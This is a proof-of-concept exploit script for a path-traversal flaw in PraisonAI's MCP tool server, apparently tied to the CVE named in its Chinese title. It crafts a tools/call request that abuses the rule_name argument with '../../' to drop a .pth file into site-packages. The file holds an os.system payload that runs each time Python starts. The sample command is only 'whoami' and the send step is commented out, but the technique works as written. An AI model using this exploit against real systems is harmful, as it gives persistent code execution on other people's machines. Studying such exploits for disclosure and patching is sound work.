CVE-2026-44336 PraisonAI路径遍历致任意代码执行漏洞

import json import requests # Target URL (Mockup for demonstration) target_url = "http://localhost:8000/mcp" # Malicious payload: Create a .pth file in the user's site-packages directory # using path traversal ("../../") # Assuming the user site-packages is at /home/user/.local/lib/python3.10/site-packages/ malicious_path = "../../.local/lib/python3.10/site-packages/exploit.pth" magic_gadget = "import os; os.system('whoami')" payload = { "jsonrpc": "2.0", "method": "tools/call", "params": { "name": "praisonai.rules.create", "arguments": { "rule_name": malicious_path, "content": magic_gadget } }, "id": 1 } print("Sending malicious payload to write file:", malicious_path) print(json.dumps(payload, indent=2)) # In a real exploit scenario, the attacker would send this request: # response = requests.post(target_url, json=payload) # When the user runs any Python command next, the 'whoami' command executes.